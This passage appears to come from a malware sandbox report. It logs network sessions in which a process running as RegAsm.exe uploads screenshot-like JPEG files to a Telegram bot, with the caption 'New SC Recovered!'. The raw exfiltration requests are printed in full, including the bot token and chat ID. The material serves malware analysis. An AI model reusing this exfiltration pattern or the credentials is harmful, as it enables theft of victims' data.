2024-10-03 07:20:36 UTC	16355	OUT	Data Raw: ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62 8a ec c3 50 74 53 4d ee 79 f8 cc 4a c4 49 34 ad 60 a2 8a 2b a8 e3 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 b4 94 00 51 45 14 Data Ascii: +?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS\|\+=(?O??qpbPtSMyJI4`+((JZ((((((QEJ)hZJ(JZJQE0(ZJQEQE
2024-10-03 07:20:36 UTC	16355	OUT	Data Raw: 45 27 e1 52 30 cf d6 93 9a 5a 4a 06 14 86 94 d2 52 18 94 66 8a 43 48 61 45 14 50 02 7e 14 51 49 48 62 fd 69 28 a5 a0 0e 9e 8a 28 ac cf 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 ea 35 5d 32 7d 5b 40 b2 b7 b7 78 d5 97 63 92 e4 81 8d 84 76 07 d6 b0 bf e1 0c d4 bf e7 bd af fd f4 df fc 4d 6e 5b 78 86 ca 1b 58 62 64 98 b2 22 a9 c2 8c 64 0c 7a d4 9f f0 92 d8 ff 00 cf 3b 8f fb e4 7f 8d 78 d4 e7 88 a7 1e 58 c5 fd c7 d4 54 fa ad 49 73 4a 6b ef 47 3f ff 00 08 6e a4 3f e5 bd af fd f6 df fc 4d 6d e9 ba 64 fa 57 87 6f a0 b8 78 d9 98 48 e0 a1 24 63 60 1d c0 f4 a9 7f e1 25 b1 ff 00 9e 57 1f f7 ca ff 00 8d 43 77 e2 1b 39 ac e7 85 22 9c 34 91 b2 8c aa e3 24 63 d6 8a 93 c4 54 8f 2c a2 fe e0 a7 f5 5a 72 e6 8c d7 de 8e 6a 8a 28 af 64 f9 80 a4 a5 a2 80 12 Data Ascii: E'R0ZJRfCHaEP~QIHbi(((((((5]2}[@xcvMn[xXbd"dz;xXTIsJkG?n?MmdWoxH$c`%WCw9"4$cT,Zrj(d
2024-10-03 07:20:36 UTC	15447	OUT	Data Raw: 8f 89 22 b4 23 e5 fb 39 90 1f 7c 90 7f a5 68 01 12 5a 91 08 41 18 53 80 98 c7 e9 50 3c 30 7f 69 0b 86 51 e7 08 b6 86 cf 38 c9 e2 b6 95 45 29 39 35 dc e9 e4 b4 52 46 2f 8b 3f d7 5b 7f ba df d2 b9 fa e8 3c 59 fe ba db fd d6 fe 95 cf d7 ad 84 fe 0c 7f ae a7 cd 66 1f ef 32 f9 7e 48 28 a2 8a e9 38 82 b2 e6 99 ad b5 65 9d 3e f4 4e ae 3e a3 06 b5 2a 09 ad a1 90 b3 b2 65 b1 d7 26 a6 5b 3b 9d 38 5a 8a 15 35 ea 68 5f f8 9e de 6d 73 4f bc b6 8a 54 82 d8 b1 65 60 03 1d c7 e6 c0 cf a5 65 78 8b 53 8b 55 d4 fc f8 11 92 14 8d 63 45 60 01 00 7b 0f 72 6b b9 ff 00 84 53 43 ff 00 9f 1f fc 8a ff 00 e3 4a 3c 2b a1 82 08 b1 1c 7a c8 e7 fa d7 9b 1c 45 18 34 d2 7a 1f 47 2a 55 25 a3 68 92 f7 4a 6b 9b a7 98 26 9a 43 63 99 ac bc c7 e9 8e 5b 78 cf e5 52 69 da 6b 59 ce d2 14 b0 19 5d Data Ascii: "#9\|hZASP<0iQ8E)95RF/?[<Yf2~H(8e>N>e&[;8Z5h_msOTe`exSUcE`{rkSCJ<+zE4zGU%hJk&Cc[xRikY]
2024-10-03 07:20:36 UTC	624	OUT	Data Raw: b3 91 b4 b4 32 14 24 7a 64 52 03 ae bd 8e f3 48 b7 24 df 4d 15 c4 b7 ad 1d e5 f5 aa fe f3 1b 54 a0 ea b8 ce 49 23 23 27 39 ce 2b 9a d7 e0 96 db 5e be 86 69 fc f9 56 66 df 2e dd bb ce 79 38 1d 2a 1b 7d 4b 50 b5 9a 49 ad af ae 61 96 5e 64 78 e5 65 67 e7 3c 90 79 aa ce ef 23 b3 bb 16 76 39 66 63 92 4f a9 a2 c0 25 75 3e 1b 92 e2 db 4b 8a 5b 12 eb 3c ba 94 50 c9 b3 ab 26 d3 85 3e a0 9c e4 77 c5 72 d5 3d ad ed dd 9e ff 00 b2 dd 4d 07 98 bb 5f ca 90 ae e1 e8 71 d4 50 c0 ea 24 67 96 c3 5a d3 ad ee 25 91 22 cb 45 6b 22 e2 28 e3 12 e4 34 64 67 2c 72 07 21 78 63 c9 a4 b1 ba 7b 2f 16 69 3a 64 0c 85 2d 5d 20 72 51 5b e7 66 06 42 32 38 39 e3 23 9c 0a e7 a2 d5 b5 28 a3 86 24 be 9f c9 85 83 c7 13 39 68 d4 83 90 76 9e 3a fb 55 65 9e 64 b8 17 09 2b ac c1 b7 89 03 10 c1 bd Data Ascii: 2$zdRH$MTI##'9+^iVf.y8*}KPIa^dxeg<y#v9fcO%u>K[<P&>wr=M_qP$gZ%"Ek"(4dg,r!xc{/i:d-] rQ[fB289#($9hv:Ued+
2024-10-03 07:20:36 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 35 31 37 35 31 63 62 38 39 37 2d 2d 0d 0a Data Ascii: -----------------------------8dd2451751cb897--
2024-10-03 07:20:36 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:20:36 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49725	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:20:47 UTC	262	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd29f77b37b2d9 Host: api.telegram.org Content-Length: 69214 Expect: 100-continue Connection: Keep-Alive
2024-10-03 07:20:48 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:20:48 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 39 66 37 37 62 33 37 62 32 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 39 66 37 37 62 33 37 62 32 64 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 33 31 2f 32 30 32 34 20 32 33 3a 35 31 3a 34 35 0a 55 73 65 72 Data Ascii: -----------------------------8dd29f77b37b2d9Content-Disposition: form-data; name="chat_id"5928888099-----------------------------8dd29f77b37b2d9Content-Disposition: form-data; name="caption"New SC Recovered!Time: 12/31/2024 23:51:45User
2024-10-03 07:20:48 UTC	16355	OUT	Data Raw: 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|T
2024-10-03 07:20:48 UTC	16355	OUT	Data Raw: ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62 8a ec c3 50 74 53 4d ee 79 f8 cc 4a c4 49 34 ad 60 a2 8a 2b a8 e3 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 b4 94 00 51 45 14 Data Ascii: +?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS\|\+=(?O??qpbPtSMyJI4`+((JZ((((((QEJ)hZJ(JZJQE0(ZJQEQE
2024-10-03 07:20:48 UTC	16355	OUT	Data Raw: 45 27 e1 52 30 cf d6 93 9a 5a 4a 06 14 86 94 d2 52 18 94 66 8a 43 48 61 45 14 50 02 7e 14 51 49 48 62 fd 69 28 a5 a0 0e 9e 8a 28 ac cf 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 ea 35 5d 32 7d 5b 40 b2 b7 b7 78 d5 97 63 92 e4 81 8d 84 76 07 d6 b0 bf e1 0c d4 bf e7 bd af fd f4 df fc 4d 6e 5b 78 86 ca 1b 58 62 64 98 b2 22 a9 c2 8c 64 0c 7a d4 9f f0 92 d8 ff 00 cf 3b 8f fb e4 7f 8d 78 d4 e7 88 a7 1e 58 c5 fd c7 d4 54 fa ad 49 73 4a 6b ef 47 3f ff 00 08 6e a4 3f e5 bd af fd f6 df fc 4d 6d e9 ba 64 fa 57 87 6f a0 b8 78 d9 98 48 e0 a1 24 63 60 1d c0 f4 a9 7f e1 25 b1 ff 00 9e 57 1f f7 ca ff 00 8d 43 77 e2 1b 39 ac e7 85 22 9c 34 91 b2 8c aa e3 24 63 d6 8a 93 c4 54 8f 2c a2 fe e0 a7 f5 5a 72 e6 8c d7 de 8e 6a 8a 28 af 64 f9 80 a4 a5 a2 80 12 Data Ascii: E'R0ZJRfCHaEP~QIHbi(((((((5]2}[@xcvMn[xXbd"dz;xXTIsJkG?n?MmdWoxH$c`%WCw9"4$cT,Zrj(d
2024-10-03 07:20:48 UTC	15447	OUT	Data Raw: 86 0c 36 63 ee b6 ee 57 a7 5f 5e 24 59 5e 23 b6 3d 3a 41 18 66 21 7c f2 40 05 70 00 e3 a0 3c fe 86 af 52 d3 8e 16 11 d6 3a 0a 58 ea 93 d2 49 3f 91 05 bb c8 e0 17 85 a2 c2 00 41 6d d9 20 72 7f 1e b8 a7 ca 59 1e 19 91 37 b4 32 ac 9b 73 8d db 4e 71 9a 7d 15 b7 22 e5 e5 67 2f b4 7c fc e8 c8 82 de fa 6d 32 1d 3a 69 26 8a da 28 dd 5a 35 90 ec 94 97 2d 92 bd 38 c8 1d fa 54 a4 de a9 42 20 dc b6 eb 11 b7 05 f9 8e 48 d4 28 70 71 d0 e3 95 ee 3b f0 0d 69 d1 58 7d 52 9d ac 76 7f 68 d7 e6 72 be e6 5c 61 ed c4 5f 64 d3 e4 8f 17 51 5c c8 8f 36 e5 ca 12 76 a7 cb 95 1c f7 2d da 96 28 21 84 ca 12 c6 ec c5 3c 46 39 11 ae 17 70 cb ab 64 1f 2f fd 9f 43 d6 b4 e8 a5 f5 3a 60 f3 1a cf b1 95 34 13 c8 60 5b 78 e4 87 ec f7 06 e2 37 77 0c 72 55 46 0f ca 01 fb bf ad 4b 27 9a fa 89 bd Data Ascii: 6cW_^$Y^#=:Af!\|@p<R:XI?Am rY72sNq}"g/\|m2:i&(Z5-8TB H(pq;iX}Rvhr\a_dQ\6v-(!<F9pd/C:`4`[x7wrUFK'
2024-10-03 07:20:48 UTC	3628	OUT	Data Raw: b6 af 7f e3 1c 7a e6 d7 6d 67 ac 6a 36 1a ad 9c a9 75 6f 77 7c ba 5c cb 33 cb 2f da 07 ca f2 cb 82 ca dd 76 aa 8e bc 03 5c 4d 03 61 45 14 50 20 ae f2 1f 02 43 24 28 e4 dc e5 94 1e 24 4f f0 ae 0e bd a1 ef d2 ce d6 dc 32 96 2c 83 a7 d0 57 0e 2f da b7 18 52 6e ee fb 1d 14 5c 12 72 9e c8 e4 5f e1 d4 8c c4 c7 a8 2a 29 e8 ae 99 23 f1 06 b2 bc 41 e1 09 74 4d 3b ed 8f 78 93 0d e1 36 84 23 af e3 ed 5d f7 f6 e4 5f f3 c9 eb 1b c7 57 0b 73 e1 55 91 41 00 cc bd 7f 1a ce 2f 17 4e 51 55 55 93 76 e8 3b d0 9a 7c 8f 53 cd 68 a2 8a f4 8e 60 ae 87 48 d2 90 46 93 4e 9e 64 8f 82 a8 46 71 5c f5 7a 2e 8f b1 b5 0b 7d b8 e8 76 7f bd b4 ed fd 71 58 56 bb b4 53 b5 cd b0 f5 e9 d1 aa 9d 45 75 af de 2a e8 d7 ae 02 0b 65 c9 1f ea cb a8 6f fb e4 9c d6 1e b9 e1 8b 98 ad a4 bc 8e db cb 11 Data Ascii: zmgj6uow\|\3/v\MaEP C$($O2,W/Rn\r_)#AtM;x6#]_WsUA/NQUUv;\|Sh`HFNdFq\z.}vqXVSEueo
2024-10-03 07:20:48 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 39 66 37 37 62 33 37 62 32 64 39 2d 2d 0d 0a Data Ascii: -----------------------------8dd29f77b37b2d9--
2024-10-03 07:20:48 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:20:48 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49726	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:20:54 UTC	262	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd2dbcb9f7e0c6 Host: api.telegram.org Content-Length: 66210 Expect: 100-continue Connection: Keep-Alive
2024-10-03 07:20:54 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:20:54 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 64 62 63 62 39 66 37 65 30 63 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 64 62 63 62 39 66 37 65 30 63 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 35 2f 32 30 32 35 20 31 39 3a 30 31 3a 31 32 0a 55 73 65 72 Data Ascii: -----------------------------8dd2dbcb9f7e0c6Content-Disposition: form-data; name="chat_id"5928888099-----------------------------8dd2dbcb9f7e0c6Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/05/2025 19:01:12User
2024-10-03 07:20:54 UTC	16355	OUT	Data Raw: 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|T
2024-10-03 07:20:54 UTC	16355	OUT	Data Raw: ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62 8a ec c3 50 74 53 4d ee 79 f8 cc 4a c4 49 34 ad 60 a2 8a 2b a8 e3 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 02 8a 28 a0 02 8a 28 a0 04 a2 8a 28 18 51 45 14 c0 4a 29 68 a0 04 a2 8a 5a 00 4a 28 a2 80 0a 4a 5a 4a 06 14 51 45 30 0a 28 a2 80 12 8a 5a 4a 06 14 51 45 00 14 94 b4 94 00 51 45 14 Data Ascii: +?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS\|\+=(?O??qpbPtSMyJI4`+((JZ((((((QEJ)hZJ(JZJQE0(ZJQEQE
2024-10-03 07:20:54 UTC	16355	OUT	Data Raw: 45 27 e1 52 30 cf d6 93 9a 5a 4a 06 14 86 94 d2 52 18 94 66 8a 43 48 61 45 14 50 02 7e 14 51 49 48 62 fd 69 28 a5 a0 0e 9e 8a 28 ac cf 0c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 ea 35 5d 32 7d 5b 40 b2 b7 b7 78 d5 97 63 92 e4 81 8d 84 76 07 d6 b0 bf e1 0c d4 bf e7 bd af fd f4 df fc 4d 6e 5b 78 86 ca 1b 58 62 64 98 b2 22 a9 c2 8c 64 0c 7a d4 9f f0 92 d8 ff 00 cf 3b 8f fb e4 7f 8d 78 d4 e7 88 a7 1e 58 c5 fd c7 d4 54 fa ad 49 73 4a 6b ef 47 3f ff 00 08 6e a4 3f e5 bd af fd f6 df fc 4d 6d e9 ba 64 fa 57 87 6f a0 b8 78 d9 98 48 e0 a1 24 63 60 1d c0 f4 a9 7f e1 25 b1 ff 00 9e 57 1f f7 ca ff 00 8d 43 77 e2 1b 39 ac e7 85 22 9c 34 91 b2 8c aa e3 24 63 d6 8a 93 c4 54 8f 2c a2 fe e0 a7 f5 5a 72 e6 8c d7 de 8e 6a 8a 28 af 64 f9 80 a4 a5 a2 80 12 Data Ascii: E'R0ZJRfCHaEP~QIHbi(((((((5]2}[@xcvMn[xXbd"dz;xXTIsJkG?n?MmdWoxH$c`%WCw9"4$cT,Zrj(d
2024-10-03 07:20:54 UTC	15447	OUT	Data Raw: 8f 89 22 b4 23 e5 fb 39 90 1f 7c 90 7f a5 68 01 12 5a 91 08 41 18 53 80 98 c7 e9 50 3c 30 7f 69 0b 86 51 e7 08 b6 86 cf 38 c9 e2 b6 95 45 29 39 35 dc e9 e4 b4 52 46 2f 8b 3f d7 5b 7f ba df d2 b9 fa e8 3c 59 fe ba db fd d6 fe 95 cf d7 ad 84 fe 0c 7f ae a7 cd 66 1f ef 32 f9 7e 48 28 a2 8a e9 38 82 b2 e6 99 ad b5 65 9d 3e f4 4e ae 3e a3 06 b5 2a 09 ad a1 90 b3 b2 65 b1 d7 26 a6 5b 3b 9d 38 5a 8a 15 35 ea 68 5f f8 9e de 6d 73 4f bc b6 8a 54 82 d8 b1 65 60 03 1d c7 e6 c0 cf a5 65 78 8b 53 8b 55 d4 fc f8 11 92 14 8d 63 45 60 01 00 7b 0f 72 6b b9 ff 00 84 53 43 ff 00 9f 1f fc 8a ff 00 e3 4a 3c 2b a1 82 08 b1 1c 7a c8 e7 fa d7 9b 1c 45 18 34 d2 7a 1f 47 2a 55 25 a3 68 92 f7 4a 6b 9b a7 98 26 9a 43 63 99 ac bc c7 e9 8e 5b 78 cf e5 52 69 da 6b 59 ce d2 14 b0 19 5d Data Ascii: "#9\|hZASP<0iQ8E)95RF/?[<Yf2~H(8e>N>e&[;8Z5h_msOTe`exSUcE`{rkSCJ<+zE4zGU%hJk&Cc[xRikY]
2024-10-03 07:20:54 UTC	624	OUT	Data Raw: b3 91 b4 b4 32 14 24 7a 64 52 03 ae bd 8e f3 48 b7 24 df 4d 15 c4 b7 ad 1d e5 f5 aa fe f3 1b 54 a0 ea b8 ce 49 23 23 27 39 ce 2b 9a d7 e0 96 db 5e be 86 69 fc f9 56 66 df 2e dd bb ce 79 38 1d 2a 1b 7d 4b 50 b5 9a 49 ad af ae 61 96 5e 64 78 e5 65 67 e7 3c 90 79 aa ce ef 23 b3 bb 16 76 39 66 63 92 4f a9 a2 c0 25 75 3e 1b 92 e2 db 4b 8a 5b 12 eb 3c ba 94 50 c9 b3 ab 26 d3 85 3e a0 9c e4 77 c5 72 d5 3d ad ed dd 9e ff 00 b2 dd 4d 07 98 bb 5f ca 90 ae e1 e8 71 d4 50 c0 ea 24 67 96 c3 5a d3 ad ee 25 91 22 cb 45 6b 22 e2 28 e3 12 e4 34 64 67 2c 72 07 21 78 63 c9 a4 b1 ba 7b 2f 16 69 3a 64 0c 85 2d 5d 20 72 51 5b e7 66 06 42 32 38 39 e3 23 9c 0a e7 a2 d5 b5 28 a3 86 24 be 9f c9 85 83 c7 13 39 68 d4 83 90 76 9e 3a fb 55 65 9e 64 b8 17 09 2b ac c1 b7 89 03 10 c1 bd Data Ascii: 2$zdRH$MTI##'9+^iVf.y8*}KPIa^dxeg<y#v9fcO%u>K[<P&>wr=M_qP$gZ%"Ek"(4dg,r!xc{/i:d-] rQ[fB289#($9hv:Ued+
2024-10-03 07:20:54 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 64 62 63 62 39 66 37 65 30 63 36 2d 2d 0d 0a Data Ascii: -----------------------------8dd2dbcb9f7e0c6--
2024-10-03 07:20:54 UTC	402	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 03 Oct 2024 07:20:54 GMT Content-Type: application/json Content-Length: 56 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Logged out"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49727	149.154.167.220	443	3508	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:21:15 UTC	262	OUT	POST /bot5556229164:AAG06WuQ2Ibcy5ZKb4lTSDlmionK0lTPWiM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd36acca76dd4a Host: api.telegram.org Content-Length: 66183 Expect: 100-continue Connection: Keep-Alive
2024-10-03 07:21:15 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-03 07:21:15 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 61 63 63 61 37 36 64 64 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 39 32 38 38 38 38 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 61 63 63 61 37 36 64 64 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 31 37 2f 32 30 32 35 20 30 33 3a 35 39 3a 35 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd36acca76dd4aContent-Disposition: form-data; name="chat_id"5928888099-----------------------------8dd36acca76dd4aContent-Disposition: form-data; name="caption"New SC Recovered!Time: 01/17/2025 03:59:50User
